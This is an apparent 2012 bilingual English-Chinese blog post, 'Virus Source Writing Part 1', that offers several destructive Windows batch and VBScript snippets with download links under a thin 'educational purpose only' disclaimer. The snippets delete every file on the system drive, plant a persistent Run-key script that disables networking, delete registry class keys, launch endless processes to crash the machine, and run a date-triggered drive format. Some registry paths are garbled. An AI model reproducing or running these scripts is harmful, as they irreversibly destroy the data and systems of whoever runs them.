2012年12月4日星期二

Virus Source Writing Part 1


This page is for educational purpose only !I will not be responsible for the consequences of the user's!

此页面仅用于教育目的!本人将不负责使用者的后果!





This Virus Deletes All The Content Of A Drive... / 该病毒会删除所有驱动器的内容...

Virus Source :

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00



Example Download

Disable Internet Permanently / 永久禁用Internet


Virus Source :

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED! ---- By Kennex
PAUSE


Example Download


The Most Simple Virus To Crush The Window / 最简单的病毒,粉碎窗口


Virus Source :

@Echo off
Del C:\ *.* |y


Example Download


This Will Crash Your Computer / 你的电脑会崩溃


Virus Source :

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"

It Only Works With Windows XP )

Example Download


Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK] /     删除键的注册表文件[注:这是危险的!]


This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*
这将删除键的注册表文件,然后循环的消息无法恢复
Virus Source :

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE


Example Download


Endless Notepads / 无尽的记事本


*This will pop up endless notepads until the computer freezes and crashes*
*这将弹出无尽的记事本,直到电脑死机和崩溃*
Virus Source :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top



Example Download

 Bomb Virus / 炸弹病毒


Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day


注: - 您可以更改日期(2009/11/25)的病毒和位置(格式E)在它的行动。
该病毒会在那一天起生效

Virus Source :

If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit


And Save It As Anything.bat

Example Download




View More: